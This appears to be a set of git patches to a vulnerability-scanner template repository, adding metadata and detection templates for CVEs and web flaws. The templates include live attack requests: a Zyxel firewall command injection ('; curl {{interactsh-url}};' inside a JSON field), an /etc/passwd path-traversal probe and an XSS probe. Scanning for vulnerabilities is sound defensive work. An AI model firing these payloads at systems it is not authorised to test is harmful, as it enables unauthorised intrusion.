From 06f92ae1b9a83ba0b0d0be5aa04bfe35bfe1c1ed Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 30 Apr 2022 08:59:39 +0000 Subject: [PATCH 01/68] Auto Generated CVE annotations [Sat Apr 30 08:59:39 UTC 2022] :robot: --- cves/2022/CVE-2022-0591.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-0591.yaml b/cves/2022/CVE-2022-0591.yaml index 22aef4aeef..63be423ad1 100644 --- a/cves/2022/CVE-2022-0591.yaml +++ b/cves/2022/CVE-2022-0591.yaml @@ -3,12 +3,17 @@ id: CVE-2022-0591 info: name: Formcraft3 < 3.8.28 - Unauthenticated SSRF author: Akincibor - severity: high + severity: critical description: The plugin does not validate the URL parameter in the formcraft3_get AJAX action, leading to SSRF issues exploitable by unauthenticated users. reference: - https://wpscan.com/vulnerability/b5303e63-d640-4178-9237-d0f524b13d47 - https://nvd.nist.gov/vuln/detail/CVE-2022-0591 tags: ssrf,wp,wp-plugin,wordpress,cve,cve2022,unauth,formcraft3 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.10 + cve-id: CVE-2022-0591 + cwe-id: CWE-918 requests: - method: GET From 92e9c1da0bc8ebc42bb24a32d7fccb22322a2be6 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Tue, 10 May 2022 13:22:31 +0900 Subject: [PATCH 02/68] Create gnuboard-sms-xss.yaml A vulnerability in Gnuboard CMS allows remote attackers to inject arbitrary Javascript into the responses returned by the server. Signed-off-by: GwanYeong Kim --- vulnerabilities/other/gnuboard-sms-xss.yaml | 32 +++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 vulnerabilities/other/gnuboard-sms-xss.yaml diff --git a/vulnerabilities/other/gnuboard-sms-xss.yaml b/vulnerabilities/other/gnuboard-sms-xss.yaml new file mode 100644 index 0000000000..af7ea489c2 --- /dev/null +++ b/vulnerabilities/other/gnuboard-sms-xss.yaml @@ -0,0 +1,32 @@ +id: gnuboard-sms-xss + +info: + name: Gnuboard CMS - SMS Emoticon XSS + author: gy741 + severity: medium + description: A vulnerability in Gnuboard CMS allows remote attackers to inject arbitrary Javascript into the responses returned by the server. + reference: + - https://sir.kr/g5_pds/4788?page=5 + - https://github.com/gnuboard/gnuboard5/commit/8182cac90d2ee2f9da06469ecba759170e782ee3 + tags: xss,gnuboard + +requests: + - method: GET + path: + - "{{BaseURL}}/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=nuclei" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + part: body + + - type: word + words: + - "text/html" + part: header From 27a039a70cd3e6b299d648da4792f5035bc2e564 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 12 May 2022 19:48:36 +0530 Subject: [PATCH 04/68] Update metadata query (#4350) * Update adobe-component-login.yaml * Update cold-fusion-cfcache-map.yaml * Update unpatched-coldfusion.yaml * Update coldfusion-debug-xss.yaml * Update CVE-2020-11978.yaml * Update CVE-2020-13927.yaml * Update CVE-2021-38540.yaml * Update CVE-2021-44451.yaml * Update CVE-2022-24288.yaml * Update airflow-debug.yaml * Update airflow-detect.yaml * Update CVE-2010-0219.yaml * Update apache-axis-detect.yaml * Update CVE-2020-11991.yaml * Update apache-cocoon-detect.yaml * Update CVE-2021-21402.yaml * Update jellyfin-detect.yaml * Update CVE-2021-21402.yaml * Update CVE-2021-21402.yaml * Update ecology-arbitrary-file-upload.yaml * Update ecology-v8-sqli.yaml * Update ecology-syncuserinfo-sqli.yaml * Update ecology-filedownload-directory-traversal.yaml * Update CNVD-2021-15822.yaml * Update dedecms-carbuyaction-fileinclude.yaml * Update dedecms-openredirect.yaml * Update tamronos-rce.yaml * Update natshell-path-traversal.yaml --- cnvd/2021/CNVD-2021-15822.yaml | 4 ++++ cves/2010/CVE-2010-0219.yaml | 2 ++ cves/2020/CVE-2020-11978.yaml | 3 +++ cves/2020/CVE-2020-11991.yaml | 2 ++ cves/2020/CVE-2020-13927.yaml | 3 +++ cves/2021/CVE-2021-21402.yaml | 6 +++++- cves/2021/CVE-2021-38540.yaml | 1 + cves/2021/CVE-2021-44451.yaml | 3 +++ cves/2022/CVE-2022-24288.yaml | 3 ++- exposed-panels/adobe/adobe-component-login.yaml | 2 ++ exposures/files/cold-fusion-cfcache-map.yaml | 2 ++ miscellaneous/unpatched-coldfusion.yaml | 2 ++ misconfiguration/airflow/airflow-debug.yaml | 3 +++ technologies/apache/airflow-detect.yaml | 3 +++ technologies/apache/apache-axis-detect.yaml | 3 +++ technologies/apache/apache-cocoon-detect.yaml | 2 ++ technologies/jellyfin-detect.yaml | 3 +++ vulnerabilities/ecology/ecology-arbitrary-file-upload.yaml | 2 ++ vulnerabilities/other/coldfusion-debug-xss.yaml | 2 ++ vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml | 3 +++ vulnerabilities/other/dedecms-openredirect.yaml | 3 +++ .../other/ecology-filedownload-directory-traversal.yaml | 2 ++ vulnerabilities/other/ecology-syncuserinfo-sqli.yaml | 2 ++ vulnerabilities/other/ecology-v8-sqli.yaml | 2 ++ vulnerabilities/other/natshell-path-traversal.yaml | 2 ++ vulnerabilities/other/tamronos-rce.yaml | 4 ++++ 26 files changed, 67 insertions(+), 2 deletions(-) diff --git a/cnvd/2021/CNVD-2021-15822.yaml b/cnvd/2021/CNVD-2021-15822.yaml index 3b7e2d8d1a..02ff83b22e 100644 --- a/cnvd/2021/CNVD-2021-15822.yaml +++ b/cnvd/2021/CNVD-2021-15822.yaml @@ -6,6 +6,10 @@ info: severity: high reference: - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog + metadata: + verified: true + shodan-query: title:"ShopXO企业级B2C电商系统提供商" + fofa-query: app="ShopXO企业级B2C电商系统提供商" tags: shopxo,lfi,cnvd,cnvd2021 requests: diff --git a/cves/2010/CVE-2010-0219.yaml b/cves/2010/CVE-2010-0219.yaml index 6a9de7c6a1..271add009d 100644 --- a/cves/2010/CVE-2010-0219.yaml +++ b/cves/2010/CVE-2010-0219.yaml @@ -10,6 +10,8 @@ info: - https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html classification: cve-id: CVE-2010-0219 + metadata: + shodan-query: http.html:"Apache Axis" tags: cve,cve2010,axis,apache,default-login,axis2 requests: diff --git a/cves/2020/CVE-2020-11978.yaml b/cves/2020/CVE-2020-11978.yaml index f441486273..133d10f1d7 100644 --- a/cves/2020/CVE-2020-11978.yaml +++ b/cves/2020/CVE-2020-11978.yaml @@ -16,6 +16,9 @@ info: cvss-score: 8.8 cve-id: CVE-2020-11978 cwe-id: CWE-77 + metadata: + verified: true + shodan-query: http.html:"Apache Airflow" || title:"Airflow - DAGs" tags: cve,cve2020,apache,airflow,rce requests: diff --git a/cves/2020/CVE-2020-11991.yaml b/cves/2020/CVE-2020-11991.yaml index b3849d5665..9269ec11d1 100644 --- a/cves/2020/CVE-2020-11991.yaml +++ b/cves/2020/CVE-2020-11991.yaml @@ -15,6 +15,8 @@ info: cve-id: CVE-2020-11991 cwe-id: CWE-611 remediation: Upgrade to Apache Cocoon 2.1.13 or later. + metadata: + shodan-query: http.html:"Apache Cocoon" tags: cve,cve2020,apache,xml,cocoon,xxe requests: diff --git a/cves/2020/CVE-2020-13927.yaml b/cves/2020/CVE-2020-13927.yaml index d1445f9393..a7725bab88 100644 --- a/cves/2020/CVE-2020-13927.yaml +++ b/cves/2020/CVE-2020-13927.yaml @@ -14,6 +14,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-13927 + metadata: + verified: true + shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" tags: cve,cve2020,apache,airflow,unauth requests: diff --git a/cves/2021/CVE-2021-21402.yaml b/cves/2021/CVE-2021-21402.yaml index a920a2285e..4070ee9ee1 100644 --- a/cves/2021/CVE-2021-21402.yaml +++ b/cves/2021/CVE-2021-21402.yaml @@ -15,6 +15,10 @@ info: cvss-score: 6.5 cve-id: CVE-2021-21402 cwe-id: CWE-22 + metadata: + verified: true + shodan-query: http.html:"Jellyfin" + fofa-query: title="Jellyfin" || body="http://jellyfin.media" tags: cve,cve2021,jellyfin,lfi requests: @@ -34,4 +38,4 @@ requests: - type: regex regex: - "\\[(font|extension|file)s\\]" - part: body \ No newline at end of file + part: body diff --git a/cves/2021/CVE-2021-38540.yaml b/cves/2021/CVE-2021-38540.yaml index 4d9d7ce135..8677ab8904 100644 --- a/cves/2021/CVE-2021-38540.yaml +++ b/cves/2021/CVE-2021-38540.yaml @@ -14,6 +14,7 @@ info: cve-id: CVE-2021-38540 cwe-id: CWE-306 metadata: + verified: true shodan-query: title:"Sign In - Airflow" tags: cve,cve2021,apache,airflow,rce diff --git a/cves/2021/CVE-2021-44451.yaml b/cves/2021/CVE-2021-44451.yaml index 73771af543..6590c06d92 100644 --- a/cves/2021/CVE-2021-44451.yaml +++ b/cves/2021/CVE-2021-44451.yaml @@ -11,6 +11,9 @@ info: classification: cve-id: CVE-2021-44451 remediation: Users should upgrade to Apache Superset 1.4.0 or higher. + metadata: + verified: true + shodan-query: title:"Superset" tags: cve,cve2021,apache,superset,default-login requests: diff --git a/cves/2022/CVE-2022-24288.yaml b/cves/2022/CVE-2022-24288.yaml index c064aa1d73..c42fd51b97 100644 --- a/cves/2022/CVE-2022-24288.yaml +++ b/cves/2022/CVE-2022-24288.yaml @@ -15,7 +15,8 @@ info: cve-id: CVE-2022-24288 cwe-id: CWE-78 metadata: - shodan-query: title:"Airflow - DAGs" + verified: true + shodan-query: title:"Airflow - DAGs" || http.html:"Apache Airflow" tags: cve,cve2022,airflow,rce requests: diff --git a/exposed-panels/adobe/adobe-component-login.yaml b/exposed-panels/adobe/adobe-component-login.yaml index 9ef09b99d8..1d46e94118 100644 --- a/exposed-panels/adobe/adobe-component-login.yaml +++ b/exposed-panels/adobe/adobe-component-login.yaml @@ -9,6 +9,8 @@ info: - https://www.exploit-db.com/ghdb/6846 classification: cwe-id: CWE-200 + metadata: + shodan-query: http.component:"Adobe ColdFusion" tags: panel,adobe,coldfusion requests: diff --git a/exposures/files/cold-fusion-cfcache-map.yaml b/exposures/files/cold-fusion-cfcache-map.yaml index 1839ab4677..4a421602b6 100644 --- a/exposures/files/cold-fusion-cfcache-map.yaml +++ b/exposures/files/cold-fusion-cfcache-map.yaml @@ -6,6 +6,8 @@ info: severity: low reference: - https://securiteam.com/windowsntfocus/5bp081f0ac/ + metadata: + shodan-query: http.component:"Adobe ColdFusion" tags: exposure,coldfusion,adobe requests: diff --git a/miscellaneous/unpatched-coldfusion.yaml b/miscellaneous/unpatched-coldfusion.yaml index 8d9c45d578..0c40b8b99c 100644 --- a/miscellaneous/unpatched-coldfusion.yaml +++ b/miscellaneous/unpatched-coldfusion.yaml @@ -7,6 +7,8 @@ info: reference: - https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html - https://twitter.com/Daviey/status/1374070630283415558 + metadata: + shodan-query: http.component:"Adobe ColdFusion" tags: rce,adobe,misc,coldfusion requests: diff --git a/misconfiguration/airflow/airflow-debug.yaml b/misconfiguration/airflow/airflow-debug.yaml index dc6f4a4a58..7e88c457d2 100644 --- a/misconfiguration/airflow/airflow-debug.yaml +++ b/misconfiguration/airflow/airflow-debug.yaml @@ -4,6 +4,9 @@ info: name: Airflow Debug Trace author: pdteam severity: low + metadata: + verified: true + shodan-query: title:"Airflow - DAGs" tags: apache,airflow,fpd requests: diff --git a/technologies/apache/airflow-detect.yaml b/technologies/apache/airflow-detect.yaml index 5306691e5b..2d90657154 100644 --- a/technologies/apache/airflow-detect.yaml +++ b/technologies/apache/airflow-detect.yaml @@ -4,6 +4,9 @@ info: name: Apache Airflow author: pdteam severity: info + metadata: + verified: true + shodan-query: http.html:"Apache Airflow" tags: tech,apache,airflow requests: diff --git a/technologies/apache/apache-axis-detect.yaml b/technologies/apache/apache-axis-detect.yaml index b5b574a7b5..6f4d1ee697 100644 --- a/technologies/apache/apache-axis-detect.yaml +++ b/technologies/apache/apache-axis-detect.yaml @@ -5,6 +5,9 @@ info: author: dogasantos severity: info description: Axis and Axis2 detection + metadata: + verified: true + shodan-query: http.html:"Apache Axis" tags: tech,axis2,middleware,apache requests: diff --git a/technologies/apache/apache-cocoon-detect.yaml b/technologies/apache/apache-cocoon-detect.yaml index 36202e3229..d9155b9c2f 100644 --- a/technologies/apache/apache-cocoon-detect.yaml +++ b/technologies/apache/apache-cocoon-detect.yaml @@ -5,6 +5,8 @@ info: author: ffffffff0x severity: info metadata: + verified: true + shodan-query: http.html:"Apache Cocoon" fofa-query: app="APACHE-Cocoon" tags: apache,cocoon,tech diff --git a/technologies/jellyfin-detect.yaml b/technologies/jellyfin-detect.yaml index 9b31eaed43..226bdb95ce 100644 --- a/technologies/jellyfin-detect.yaml +++ b/technologies/jellyfin-detect.yaml @@ -4,6 +4,9 @@ info: name: Jellyfin detected author: dwisiswant0 severity: info + metadata: + verified: true + shodan-query: http.html:"Jellyfin" tags: tech,jellyfin requests: diff --git a/vulnerabilities/ecology/ecology-arbitrary-file-upload.yaml b/vulnerabilities/ecology/ecology-arbitrary-file-upload.yaml index f941cc707b..1b96e89056 100644 --- a/vulnerabilities/ecology/ecology-arbitrary-file-upload.yaml +++ b/vulnerabilities/ecology/ecology-arbitrary-file-upload.yaml @@ -6,6 +6,8 @@ info: severity: medium reference: - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g + metadata: + fofa-query: app="泛微-协同办公OA" tags: ecology,upload,fileupload,intrusive requests: diff --git a/vulnerabilities/other/coldfusion-debug-xss.yaml b/vulnerabilities/other/coldfusion-debug-xss.yaml index ec093ae5c6..4de60288e2 100644 --- a/vulnerabilities/other/coldfusion-debug-xss.yaml +++ b/vulnerabilities/other/coldfusion-debug-xss.yaml @@ -7,6 +7,8 @@ info: description: The remote Adobe ColdFusion debug page has been left open to unauthenticated users, this could allow remote attackers to trigger a reflected cross site scripting against the visitors of the site. reference: - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml + metadata: + shodan-query: http.component:"Adobe ColdFusion" tags: adobe,coldfusion,xss requests: diff --git a/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml b/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml index 41e0ebeeb0..72d4198957 100644 --- a/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml +++ b/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml @@ -7,6 +7,9 @@ info: description: A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter. reference: - https://www.cnblogs.com/milantgh/p/3615986.html + metadata: + verified: true + shodan-query: http.html:"power by dedecms" || title:"dedecms" tags: dedecms requests: diff --git a/vulnerabilities/other/dedecms-openredirect.yaml b/vulnerabilities/other/dedecms-openredirect.yaml index 08d6f16cb7..689d98efa2 100644 --- a/vulnerabilities/other/dedecms-openredirect.yaml +++ b/vulnerabilities/other/dedecms-openredirect.yaml @@ -6,6 +6,9 @@ info: severity: low reference: - https://blog.csdn.net/ystyaoshengting/article/details/82734888 + metadata: + verified: true + shodan-query: http.html:"power by dedecms" || title:"dedecms" tags: dedecms,redirect requests: diff --git a/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml b/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml index f063f98b29..61101d9fa7 100644 --- a/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml +++ b/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml @@ -4,6 +4,8 @@ info: name: Ecology Directory Traversal author: princechaddha severity: medium + metadata: + fofa-query: app="泛微-协同办公OA" tags: ecology,lfi requests: diff --git a/vulnerabilities/other/ecology-syncuserinfo-sqli.yaml b/vulnerabilities/other/ecology-syncuserinfo-sqli.yaml index 81aecd13f1..7039f82f5c 100644 --- a/vulnerabilities/other/ecology-syncuserinfo-sqli.yaml +++ b/vulnerabilities/other/ecology-syncuserinfo-sqli.yaml @@ -6,6 +6,8 @@ info: severity: high reference: - https://www.weaver.com.cn/ + metadata: + fofa-query: app="泛微-协同办公OA" tags: ecology,sqli requests: diff --git a/vulnerabilities/other/ecology-v8-sqli.yaml b/vulnerabilities/other/ecology-v8-sqli.yaml index 4b23314522..5279e14a6f 100644 --- a/vulnerabilities/other/ecology-v8-sqli.yaml +++ b/vulnerabilities/other/ecology-v8-sqli.yaml @@ -6,6 +6,8 @@ info: severity: high reference: - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20V8%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html + metadata: + fofa-query: app="泛微-协同办公OA" tags: ecology,sqli requests: diff --git a/vulnerabilities/other/natshell-path-traversal.yaml b/vulnerabilities/other/natshell-path-traversal.yaml index f0e47959f9..629dd6eec9 100644 --- a/vulnerabilities/other/natshell-path-traversal.yaml +++ b/vulnerabilities/other/natshell-path-traversal.yaml @@ -6,6 +6,8 @@ info: severity: high reference: - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw + metadata: + fofa-query: title="蓝海卓越计费管理系统" tags: natshell,lfi requests: diff --git a/vulnerabilities/other/tamronos-rce.yaml b/vulnerabilities/other/tamronos-rce.yaml index 417bbba2a3..2b473e957c 100644 --- a/vulnerabilities/other/tamronos-rce.yaml +++ b/vulnerabilities/other/tamronos-rce.yaml @@ -6,6 +6,10 @@ info: severity: critical reference: - https://twitter.com/sec715/status/1405336456923471874 + metadata: + verified: true + shodan-query: title:"TamronOS IPTV系统" + fofa-query: title="TamronOS IPTV系统" tags: tamronos,rce requests: From c616179c95855901bd5d6baec5b9d42302f84b50 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 13 May 2022 01:11:32 +0530 Subject: [PATCH 06/68] Update gnuboard-sms-xss.yaml --- vulnerabilities/other/gnuboard-sms-xss.yaml | 25 ++++++++++++--------- 1 file changed, 14 insertions(+), 11 deletions(-) diff --git a/vulnerabilities/other/gnuboard-sms-xss.yaml b/vulnerabilities/other/gnuboard-sms-xss.yaml index af7ea489c2..155dea7f7d 100644 --- a/vulnerabilities/other/gnuboard-sms-xss.yaml +++ b/vulnerabilities/other/gnuboard-sms-xss.yaml @@ -8,25 +8,28 @@ info: reference: - https://sir.kr/g5_pds/4788?page=5 - https://github.com/gnuboard/gnuboard5/commit/8182cac90d2ee2f9da06469ecba759170e782ee3 + metadata: + verified: true + shodan-query: http.html:"Gnuboard" tags: xss,gnuboard requests: - method: GET path: - - "{{BaseURL}}/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=nuclei" + - "{{BaseURL}}/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard" matchers-condition: and matchers: + - type: word + part: body + words: + - '"0nuboard"' + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 - - - type: word - words: - - "" - part: body - - - type: word - words: - - "text/html" - part: header From 6b403b30bfb082797c8749491226223f212a9703 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 12 May 2022 19:45:17 +0000 Subject: [PATCH 07/68] Auto Generated New Template Addition List [Thu May 12 19:45:16 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b94ac64882..545a2d5f02 100644 --- a/.new-additions +++ b/.new-additions @@ -14,6 +14,7 @@ technologies/dedecms-detect.yaml technologies/ecology-detect.yaml technologies/jspxcms-detect.yaml vulnerabilities/other/ecsimagingpacs-rce.yaml +vulnerabilities/other/gnuboard-sms-xss.yaml vulnerabilities/wordpress/age-gate-open-redirect.yaml vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml vulnerabilities/wordpress/wp-security-open-redirect.yaml From a22df99866b761bd4a9b1304c5cd087ef3de3f11 Mon Sep 17 00:00:00 2001 From: Dominik Opyd Date: Thu, 12 May 2022 23:01:08 +0200 Subject: [PATCH 08/68] feat(token-spray): moonpay api test (#4380) * feat(token-spray): moonpay api test * refactor: pascal case name --- token-spray/api-moonpay.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 token-spray/api-moonpay.yaml diff --git a/token-spray/api-moonpay.yaml b/token-spray/api-moonpay.yaml new file mode 100644 index 0000000000..a7ec6a7d0d --- /dev/null +++ b/token-spray/api-moonpay.yaml @@ -0,0 +1,22 @@ +id: api-moonpay + +info: + name: MoonPay API Test + author: 0ri2N + severity: info + reference: + - https://dashboard.moonpay.com/getting_started + tags: token-spray,moonpay,cryptocurrencies + +self-contained: true +requests: + - method: GET + path: + - "https://api.moonpay.com/v3/currencies/btc/buy_quote?apiKey={{token}}&baseCurrencyAmount=1" + + matchers: + - type: word + part: body + words: + - '"accountId":' + condition: and From 5100b5c3fa169c5169bd0b75924468e30d84c180 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 12 May 2022 21:01:30 +0000 Subject: [PATCH 09/68] Auto Generated New Template Addition List [Thu May 12 21:01:30 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 545a2d5f02..c49766a07d 100644 --- a/.new-additions +++ b/.new-additions @@ -13,6 +13,7 @@ technologies/cloudflare-nginx-detect.yaml technologies/dedecms-detect.yaml technologies/ecology-detect.yaml technologies/jspxcms-detect.yaml +token-spray/api-moonpay.yaml vulnerabilities/other/ecsimagingpacs-rce.yaml vulnerabilities/other/gnuboard-sms-xss.yaml vulnerabilities/wordpress/age-gate-open-redirect.yaml From 3e4e2d4a5c78ff829539091f5ff484082824c3cf Mon Sep 17 00:00:00 2001 From: h1ei1 <62200676+h1ei1@users.noreply.github.com> Date: Fri, 13 May 2022 10:52:42 +0800 Subject: [PATCH 10/68] Create CVE-2022-30525.yaml --- cves/2022/CVE-2022-30525.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2022/CVE-2022-30525.yaml diff --git a/cves/2022/CVE-2022-30525.yaml b/cves/2022/CVE-2022-30525.yaml new file mode 100644 index 0000000000..9c9d520a17 --- /dev/null +++ b/cves/2022/CVE-2022-30525.yaml @@ -0,0 +1,25 @@ +id: CVE-2022-30525 + +info: + name: Zyxel Firewall Unauthenticated RCE + author: h1ei1 + severity: critical + description: The vulnerability affects Zyxel firewalls that support Zero Touch Provisioning (ZTP), including the ATP Series, VPN Series, and USG FLEX Series (including USG20-VPN and USG20W-VPN), allowing an unauthenticated remote attacker to target the affected device as nobody Execute arbitrary code as a user on . + reference: + - https://https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/ + tags: rce,Zyxel,cve,cve2022 + +requests: + - raw: + - | + POST /ztp/cgi-bin/handler HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; ping {{interactsh-url}};","data":"hi"} + + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" From b3a755e2a049c531e1d606182041cb70498cd0fc Mon Sep 17 00:00:00 2001 From: Veshraj Ghimire <54109630+V35HR4J@users.noreply.github.com> Date: Fri, 13 May 2022 09:33:08 +0545 Subject: [PATCH 11/68] Create CVE-2022-1392.yaml --- cves/2022/CVE-2022-1392.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 cves/2022/CVE-2022-1392.yaml diff --git a/cves/2022/CVE-2022-1392.yaml b/cves/2022/CVE-2022-1392.yaml new file mode 100644 index 0000000000..4294d5f8a4 --- /dev/null +++ b/cves/2022/CVE-2022-1392.yaml @@ -0,0 +1,30 @@ +id: CVE-2022-1392 + +info: + name: Videos sync PDF <= 1.7.4 - Unauthenticated LFI + author: Veshraj + severity: high + description: The plugin does not validate the p parameter before using it in an include statement, which could lead to Local File Inclusion issues. + reference: + - https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1392 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-1392 + tags: lfi,wp-plugin,cve,cve2022 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 From 891e6e48e9dd6d9fd0a50c46acb8cbb5c30b707b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 13 May 2022 14:16:09 +0530 Subject: [PATCH 12/68] Update CVE-2022-30525.yaml --- cves/2022/CVE-2022-30525.yaml | 22 +++++++++++++++------- 1 file changed, 15 insertions(+), 7 deletions(-) diff --git a/cves/2022/CVE-2022-30525.yaml b/cves/2022/CVE-2022-30525.yaml index 9c9d520a17..359020a92e 100644 --- a/cves/2022/CVE-2022-30525.yaml +++ b/cves/2022/CVE-2022-30525.yaml @@ -1,13 +1,16 @@ id: CVE-2022-30525 info: - name: Zyxel Firewall Unauthenticated RCE - author: h1ei1 + name: Zyxel Firewall - Unauthenticated RCE + author: h1ei1,prajiteshsingh severity: critical - description: The vulnerability affects Zyxel firewalls that support Zero Touch Provisioning (ZTP), including the ATP Series, VPN Series, and USG FLEX Series (including USG20-VPN and USG20W-VPN), allowing an unauthenticated remote attacker to target the affected device as nobody Execute arbitrary code as a user on . + description: | + The vulnerability affects Zyxel firewalls that support Zero Touch Provisioning (ZTP), including the ATP Series, VPN Series, and USG FLEX Series (including USG20-VPN and USG20W-VPN), allowing an unauthenticated remote attacker to target the affected device as nobody Execute arbitrary code as a user on. reference: - - https://https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/ - tags: rce,Zyxel,cve,cve2022 + - https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/ + - https://github.com/rapid7/metasploit-framework/pull/16563 + - https://nvd.nist.gov/vuln/detail/CVE-2022-30525 + tags: rce,zyxel,cve,cve2022,firewall,unauth requests: - raw: @@ -16,10 +19,15 @@ requests: Host: {{Hostname}} Content-Type: application/json - {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; ping {{interactsh-url}};","data":"hi"} + {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl {{interactsh-url}};","data":"hi"} + matchers-condition: and matchers: - type: word part: interactsh_protocol words: - - "dns" + - "http" + + - type: status + status: + - 500 From 2fe79ed9a90d28d4e5f2b636ae9fb16e43b03565 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 13 May 2022 08:48:14 +0000 Subject: [PATCH 13/68] Auto Generated New Template Addition List [Fri May 13 08:48:14 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c49766a07d..81bcfa9f90 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ cves/2020/CVE-2020-36510.yaml cves/2022/CVE-2022-1040.yaml cves/2022/CVE-2022-1221.yaml cves/2022/CVE-2022-29548.yaml +cves/2022/CVE-2022-30525.yaml exposed-panels/privx-panel.yaml exposed-panels/umbraco-login.yaml exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml From 3dca8ebdd681ff1e2051347482bfba5f7ccd8804 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 13 May 2022 09:00:25 +0000 Subject: [PATCH 14/68] Auto Generated Templates Stats [Fri May 13 09:00:25 UTC 2022] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 3021 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 1526 insertions(+), 1517 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 59d252c4e4..649fb65dc0 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":1150},{"name":"panel","count":513},{"name":"lfi","count":460},{"name":"xss","count":363},{"name":"wordpress","count":358},{"name":"exposure","count":292},{"name":"rce","count":289},{"name":"cve2021","count":283},{"name":"tech","count":265},{"name":"wp-plugin","count":259},{"name":"cve2020","count":196},{"name":"","count":188},{"name":"token-spray","count":153},{"name":"joomla","count":131},{"name":"config","count":126},{"name":"apache","count":120},{"name":"cve2018","count":120},{"name":"cve2019","count":118},{"name":"cve2010","count":111},{"name":"default-login","count":109},{"name":"unauth","count":103},{"name":"iot","count":102},{"name":"oast","count":96},{"name":"login","count":85},{"name":"takeover","count":73},{"name":"token","count":72},{"name":"redirect","count":68},{"name":"misconfig","count":65},{"name":"cve2017","count":64},{"name":"sqli","count":62},{"name":"ssrf","count":60},{"name":"file","count":60},{"name":"cve2022","count":59},{"name":"network","count":53},{"name":"oracle","count":50},{"name":"router","count":49},{"name":"wp","count":49},{"name":"cve2016","count":45},{"name":"disclosure","count":45},{"name":"plugin","count":40},{"name":"cve2014","count":37},{"name"